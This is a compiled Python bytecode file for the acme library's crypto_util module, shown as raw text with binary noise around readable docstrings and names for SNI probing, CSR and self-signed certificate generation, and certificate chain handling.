Current File : //lib/python3/dist-packages/acme/__pycache__/crypto_util.cpython-312.pyc

�

M/�e�F��n�dZddlZddlZddlZddlZddlZddlZddlZddlm	Z	ddlm
Z
ddlmZddlmZddlm
Z
ddlmZdd	lmZdd
lmZddlmZddlZddlmZdd
lmZddlmZej2e�Zej8ZGd�d�ZGd�d�Zddeddfde de de!de!de!dee"e!fde
ee dejFfd�Z$			d4de d e
eee"ee"fd!e%d"e
eeejLejNfde f
d#�Z(d$eejFejRfdee"fd%�Z*d&eejFejRfdee"fd'�Z+d&eejFejRfdee"fd(�Z,d&eejFejRfdee"fd)�Z-					d5d*ej\d e
ee"d+e
e!d,e!d-e%d.e
eej^d/e
eeejLejNfdejFfd0�Z0ejbfd1eeejdeejFfd2e!de fd3�Z3y)6zCrypto utilities.�N)�Any)�Callable)�List)�Mapping)�Optional)�Sequence)�Set)�Tuple)�Union)�crypto)�SSL)�errorsc��eZdZdeeeejejfffd�Z	de
jdeeejejffd�Z
y)�_DefaultCertSelection�certsc��||_y�N)r)�selfrs  �2/usr/lib/python3/dist-packages/acme/crypto_util.py�__init__z_DefaultCertSelection.__init__&s	����
��
connection�returnc�`�|j�}|r|jj|d�Syr)�get_servernamer�get)rr�server_names   r�__call__z_DefaultCertSelection.__call__)s+�� �/�/�1����:�:�>�>�+�t�4�4�rN)�__name__�
__module__�__qualname__r�bytesr
r�PKey�X509rr
�
Connectionrr�rrrr%s[���g�e�U�6�;�;����3K�-L�&L�M���3�>�>��h�u�V�[�[�RX�R]�R]�E]�?^�6_�rrc�z�eZdZdZdeddfdej
deeee	e
je
jffde
deeej eegefdeeej gee	e
je
jffddfd	�Zd
edefd�Zdej ddfd
�ZGd�d�Zde	eeffd�Zy)�	SSLSocketa�SSL wrapper for sockets.

    :ivar socket sock: Original wrapped socket.
    :ivar dict certs: Mapping from domain names (`bytes`) to
        `OpenSSL.crypto.X509`.
    :ivar method: See `OpenSSL.SSL.Context` for allowed values.
    :ivar alpn_selection: Hook to select negotiated ALPN protocol for
        connection.
    :ivar cert_selection: Hook to select certificate for connection. If given,
        `certs` parameter would be ignored, and therefore must be empty.

    N�sockr�method�alpn_selection�cert_selectionrc��||_||_||_|s
|std��|r
|rtd��|}|�t	|r|ni�}||_y)Nz*Neither cert_selection or certs specified.z(Both cert_selection and certs specified.)r)r+r*�
ValueErrorrr,)rr)rr*r+r,�actual_cert_selections       rrzSSLSocket.__init__=sg����	�,�������e��I�J�J��e��G�H�H�Tb�	�!�(�$9�5�%�b�$Q�!�3��r�namec�.�t|j|�Sr)�getattrr)�rr0s  r�__getattr__zSSLSocket.__getattr__Ts���t�y�y�$�'�'rrc���|j|�}|�%tjd|j��y|\}}t	j
|j�}|jtj�|jtj�|j|�|j|�|j�|j|j�|j|�y)a�SNI certificate callback.

        This method will set a new OpenSSL context object for this
        connection when an incoming connection provides an SNI name
        (in order to serve the appropriate certificate, if any).

        :param connection: The TLS connection object on which the SNI
            extension was received.
        :type connection: :class:`OpenSSL.Connection`

        Nz=Certificate selection for server name %s failed, dropping SSL)r,�logger�debugrr
�Contextr*�set_options�OP_NO_SSLv2�OP_NO_SSLv3�use_privatekey�use_certificater+�set_alpn_select_callback�set_context)rr�pair�key�cert�new_contexts      r�_pick_certificate_cbzSSLSocket._pick_certificate_cbWs����"�"�:�.���<��L�L�X�#�2�2�4�
6���	��T��k�k�$�+�+�.��������0�������0��"�"�3�'��#�#�D�)����*��0�0��1D�1D�E����{�+rc�T�eZdZdZdej
ddfd�Zdedefd�Z	dede
fd	�Zy)
�SSLSocket.FakeConnectionzFake OpenSSL.SSL.Connection.rrNc��||_yr)�_wrapped)rrs  rrz!SSLSocket.FakeConnection.__init__ws	��&�D�Mrr0c�.�t|j|�Sr)r2rHr3s  rr4z$SSLSocket.FakeConnection.__getattr__zs���4�=�=�$�/�/r�unused_argsc��	|jj�S#tj$r}t	j
|��d}~wwxYwr)rH�shutdownr
�Error�socket�error)rrJrOs   rrLz!SSLSocket.FakeConnection.shutdown}s?��
*��}�}�-�-�/�/���9�9�
*�
�l�l�5�)�)��
*�s��A	�A�A	)rr r!�__doc__r
r%r�strrr4�boolrLr&rr�FakeConnectionrFrsB��*�	'�s�~�~�	'�$�	'�	0�C�	0�C�	0�		*��		*��		*rrSc���|jj�\}}	tj|j�}|jtj�|jtj�|j|j�|j�|j|j�|jtj||��}|j�tj!d|�	|j#�||fS#tj$$r}t'j(|��d}~wwxYw#|j+��xYw)NzPerforming handshake with %s)r)�acceptr
r8r*r9r:r;�set_tlsext_servername_callbackrDr+r>rSr%�set_accept_stater6r7�do_handshakerMrNrO�close)rr)�addr�context�ssl_sockrOs      rrUzSSLSocket.accept�s���Y�Y�%�%�'�
��d�	��k�k�$�+�+�.�G�������0�������0��2�2�4�3L�3L�M��"�"�.��0�0��1D�1D�E��*�*�3�>�>�'�4�+H�I�H��%�%�'�
�L�L�7��>�
*��%�%�'��T�>�!���9�9�
*��l�l�5�)�)��
*��	�
�J�J�L��s0�C*E�
D�E�E�1E�E�E�E!)rr r!rP�_DEFAULT_SSL_METHODrNrrr"r
rr#r$�intrr
r%rrrQrr4rDrSrUr&rrr(r(0s#���UY�2�\`�UY�
4�V�]�]�4� ����f�k�k�6�;�;�6N�0O�)O�!P�Q�4��4�"*�(�C�N�N�D��K�3P�RW�3W�*X�!Y�4�"*�(�C�N�N�3C�3;�E�&�+�+�BH�+�+�CN�=O�4P�4P�+Q�"R�	4��4�.(��(��(�,�s�~�~�,�$�,�6*�*�,��n�c�1�2�rr(i�i,)�rr0�host�port�timeoutr*�source_address�alpn_protocolsrc
��tj|�}|j|�d|i}	tj	d||t|�rdj
|d|d�nd�||f}	tj|	fi|��}
tj|
�5}tj||�}
|
j�|
j!|�|�|
j#|�	|
j%�|
j'�	ddd�
j)�}|sJ�|S#tj$r}tj|��d}~wwxYw#tj$r}tj|��d}~wwxYw#1swY�xYw)a	Probe SNI server for SSL certificate.

    :param bytes name: Byte string to send as the server name in the
        client hello message.
    :param bytes host: Host to connect to.
    :param int port: Port to connect to.
    :param int timeout: Timeout in seconds.
    :param method: See `OpenSSL.SSL.Context` for allowed values.
    :param tuple source_address: Enables multi-path probing (selection
        of source interface). See `socket.creation_connection` for more
        info. Available only in Python 2.7+.
    :param alpn_protocols: Protocols to request using ALPN.
    :type alpn_protocols: `Sequence` of `bytes`

    :raises acme.errors.Error: In case of any problems.

    :returns: SSL certificate presented by the server.
    :rtype: OpenSSL.crypto.X509

    rcz!Attempting to connect to %s:%d%s.z
 from {0}:{1}r�r_N)r
r8�set_timeoutr6r7�any�formatrN�create_connectionrOrrM�
contextlib�closingr%�set_connect_state�set_tlsext_host_name�set_alpn_protosrXrL�get_peer_certificate)r0r`rarbr*rcrdr[�
socket_kwargs�socket_tupler)rO�client�
client_sslrBs               r�	probe_sniru�sx��.�k�k�&�!�G����� �%�~�6�M�"����/��t��^�$�
�"�"��q�!��q�!�
�+-�	
�,0��,���'�'��F�
�F��
�	�	�D�	!�
&�V��^�^�G�V�4�
��$�$�&��'�'��-��%��&�&�~�6�	&��#�#�%����!�
&��*�*�,�D��K�4��K��!�<�<�"��l�l�5�!�!��"���y�y�	&��,�,�u�%�%��	&��
&�
&�sC�AD!�AF�" E�!E�4E	�	E�E>�$E9�9E>�>F�F
�private_key_pem�domains�must_staple�ipaddrsc���tjtj|�}tj�}g}|�g}|�g}t	|�t	|�zdk(rtd��|D]}|j
d|z��|D] }|j
d|jz��"dj|�jd�}	tjdd|	�	�g}
|r'|
j
tjd
dd�	��|j|
�|j|�|jd�|j|d�tjtj|�S)
a�Generate a CSR containing domains or IPs as subjectAltNames.

    :param buffer private_key_pem: Private key, in PEM PKCS#8 format.
    :param list domains: List of DNS names to include in subjectAltNames of CSR.
    :param bool must_staple: Whether to include the TLS Feature extension (aka
        OCSP Must Staple: https://tools.ietf.org/html/rfc7633).
    :param list ipaddrs: List of IPaddress(type ipaddress.IPv4Address or ipaddress.IPv6Address)
    names to include in subbjectAltNames of CSR.
    params ordered this way for backward competablity when called by positional argument.
    :returns: buffer PEM-encoded Certificate Signing Request.
    rzAAt least one of domains or ipaddrs parameter need to be not empty�DNS:�IP:�, �ascii�subjectAltNameF��critical�values1.3.6.1.5.5.7.1.24sDER:30:03:02:01:05�sha256)r�load_privatekey�FILETYPE_PEM�X509Req�lenr.�append�exploded�join�encode�
X509Extension�add_extensions�
set_pubkey�set_version�sign�dump_certificate_request)rvrwrxry�private_key�csr�sanlist�address�ips�
san_string�
extensionss           r�make_csrr��sa���(�(����_�.�K�
�.�.�
�C��G���������
�7�|�C��L� �A�%��\�]�]��)�����v��'�(�)��-�����u�s�|�|�+�,�-����7�#�*�*�7�3�J�	������	
��J�����&�.�.�!��'�)�	*����z�"��N�N�;���O�O�A���H�H�[�(�#��*�*����S�"�"r�loaded_cert_or_reqc��|j�j}t|�}|�|S|g|D�cgc]
}||k7s�	|��c}zScc}wr)�get_subject�CN�_pyopenssl_cert_or_req_san)r��common_name�sans�ds    r� _pyopenssl_cert_or_req_all_namesr�sP��%�0�0�2�5�5�K�%�&8�9�D������=�t�@�!�q�K�/?�A�@�@�@��@s
�
A�A�cert_or_reqc��d}d|z}t|�}|D�cgc]'}|j|�r|j|�d��)c}Scc}w)a�Get Subject Alternative Names from certificate or CSR using pyOpenSSL.

    .. todo:: Implement directly in PyOpenSSL!

    .. note:: Although this is `acme` internal API, it is used by
        `letsencrypt`.

    :param cert_or_req: Certificate or CSR.
    :type cert_or_req: `OpenSSL.crypto.X509` or `OpenSSL.crypto.X509Req`.

    :returns: A list of Subject Alternative Names that is DNS.
    :rtype: `list` of `str`

    �:�DNSrf)�_pyopenssl_extract_san_list_raw�
startswith�split�r��part_separator�prefix�
sans_parts�parts     rr�r�#sX��$�N�
�^�
#�F�0��=�J�#�?��d�o�o�f�&=�
�J�J�~�&�q�)�?�?��?s�,Ac��d}d|z}t|�}|D�cgc]"}|j|�s�|t|�d��$c}Scc}w)aeGet Subject Alternative Names IPs from certificate or CSR using pyOpenSSL.

    :param cert_or_req: Certificate or CSR.
    :type cert_or_req: `OpenSSL.crypto.X509` or `OpenSSL.crypto.X509Req`.

    :returns: A list of Subject Alternative Names that are IP Addresses.
    :rtype: `list` of `str`. note that this returns as string, not IPaddress object

    r�z
IP AddressN)r�r�r�r�s     r�_pyopenssl_cert_or_req_san_ipr�>sG���N�
�N�
*�F�0��=�J�+5�Q�4�����9P�D��V����Q�Q��Qs
�A�Ac��t|tj�r4tjtj|�jd�}n3tjtj|�jd�}tjd|�}d}|�g}|S|jd�j|�}|S)aGet raw SAN string from cert or csr, parse it as UTF-8 and return.

    :param cert_or_req: Certificate or CSR.
    :type cert_or_req: `OpenSSL.crypto.X509` or `OpenSSL.crypto.X509Req`.

    :returns: raw san strings, parsed byte as utf-8
    :rtype: `list` of `str`

    zutf-8z5X509v3 Subject Alternative Name:(?: critical)?\s*(.*)r}rf)�
isinstancerr$�dump_certificate�
FILETYPE_TEXT�decoder��re�search�groupr�)r��text�raw_san�parts_separatorr�s     rr�r�Rs����+�v�{�{�+��&�&�v�';�';�[�I�P�P�QX�Y���.�.�v�/C�/C�[�Q�X�X�Y`�a���i�i�P�RV�W�G��O����J���-4�M�M�!�,<�,B�,B�?�,S�J��rrA�
not_before�validity�	force_sanr�r�c	���|s	|sJd��tj�}|jtt	j
t
jd��d��|jd�|�g}|�g}|�g}|jtjddd��t|�dkDr|d|j�_
|j|j��g}|D]}	|jd|	z��|D] }
|jd	|
jz��"d
j!|�j#d�}|st|�dkDst|�dkDr'|jtjd
d|���|j%|�|j'|�dn|�|j)|�|j+|�|j-|d�|S)atGenerate new self-signed certificate.

    :type domains: `list` of `str`
    :param OpenSSL.crypto.PKey key:
    :param bool force_san:
    :param extensions: List of additional extensions to include in the cert.
    :type extensions: `list` of `OpenSSL.crypto.X509Extension`
    :type ips: `list` of (`ipaddress.IPv4Address` or `ipaddress.IPv6Address`)

    If more than one domain is provided, all of the domains are put into
    ``subjectAltName`` X.509 extension and first domain is set as the
    subject CN. If only one domain is provided no ``subjectAltName``
    extension is used, unless `force_san` is ``True``.

    z7Must provide one or more hostnames or IPs for the cert.��sbasicConstraintsTsCA:TRUE, pathlen:0rr{r|r}r~rfrFr�r�)rr$�set_serial_numberr^�binascii�hexlify�os�urandomr�r�r�r�r�r��
set_issuerr�r�r�r��gmtime_adj_notBefore�gmtime_adj_notAfterr�r�)rArwr�r�r�r�r�rBr�r��ipr�s            r�gen_ss_certr�qs���*�c�T�T�T�>��;�;�=�D����3�x�/�/��
�
�2��?��D�E����Q�����
�����
�{�����������'<�	>��
�7�|�a�� '��
�������O�O�D�$�$�&�'��G��)�����v��'�(�)��,�����u�r�{�{�*�+�,����7�#�*�*�7�3�J��C��L�1�$��C��1�����&�.�.����
�	�	���
�#����:�#5�a�:�F����X�&��O�O�C���I�I�c�8���Kr�chain�filetypec����dttjtjfdt
f�fd��dj
�fd�|D��S)z�Dump certificate chain into a bundle.

    :param list chain: List of `OpenSSL.crypto.X509` (or wrapped in
        :class:`josepy.util.ComparableX509`).

    :returns: certificate chain bundle
    :rtype: bytes

    rBrc����t|tj�rEt|jtj
�rt
jd��|j}t	j�|�S)NzUnexpected CSR provided.)	r��jose�ComparableX509�wrappedrr�rrMr�)rBr�s �r�
_dump_certz(dump_pyopenssl_chain.<locals>._dump_cert�sQ����d�D�/�/�0��$�,�,����7��l�l�#=�>�>��<�<�D��&�&�x��6�6rrc3�.�K�|]}�|����y�wrr&)�.0rBr�s  �r�	<genexpr>z'dump_pyopenssl_chain.<locals>.<genexpr>�s�����7��J�t�$�7�s�)rr�r�rr$r"r�)r�r�r�s `@r�dump_pyopenssl_chainr��sA���7��t�2�2�F�K�K�?�@�7�U�7��8�8�7��7�7�7r)NFN)NNi�:	TNN)4rPr�rk�	ipaddress�loggingr�r�rN�typingrrrrrrr	r
r�josepyr��OpenSSLrr
�acmer�	getLoggerrr6�
SSLv23_METHODr]rr(r"r^rQr$rurR�IPv4Address�IPv6Addressr�r�r�r�r�r�r#r�r�r�r�r�r&rr�<module>r�s��������	�	�
��������������	��	�	�8�	$���'�'����u�u�p58��/�SZ�:>�6�E�6��6�c�6�#�6��6�AF�s�C�x��6�&�x���7�6�CI�;�;�6�rVZ�!&�\`�4"�e�4"�h�u�S��X�t�C�y�=P�7Q�.R�4"��4"��t�E�)�*?�*?��AV�AV�*V�$W�X�Y�4"��4"�nA��v�{�{�F�N�N�?Z�9[�A�*.�s�)�A�?�E�&�+�+�v�~�~�2M�,N�?�SW�X[�S\�?�6R�u�V�[�[�&�.�.�5P�/Q�R�VZ�[^�V_�R�(��v�{�{�F�N�N�7R�1S��X\�]`�Xa��>BF�,0�FJ�CG�[_�	?�V�[�[�?�8�D��I�+>�?�$�S�M�?��?�?C�?�%�T�&�*>�*>�%?�@�?��d�5��)>�)>�	�@U�@U�)U�#V�W�X�	?�
�[�[�?�F*0�)<�)<�8��d�4�+>�+>�&?��f�k�k�AR�&R� S�8�#&�8�AF�8r
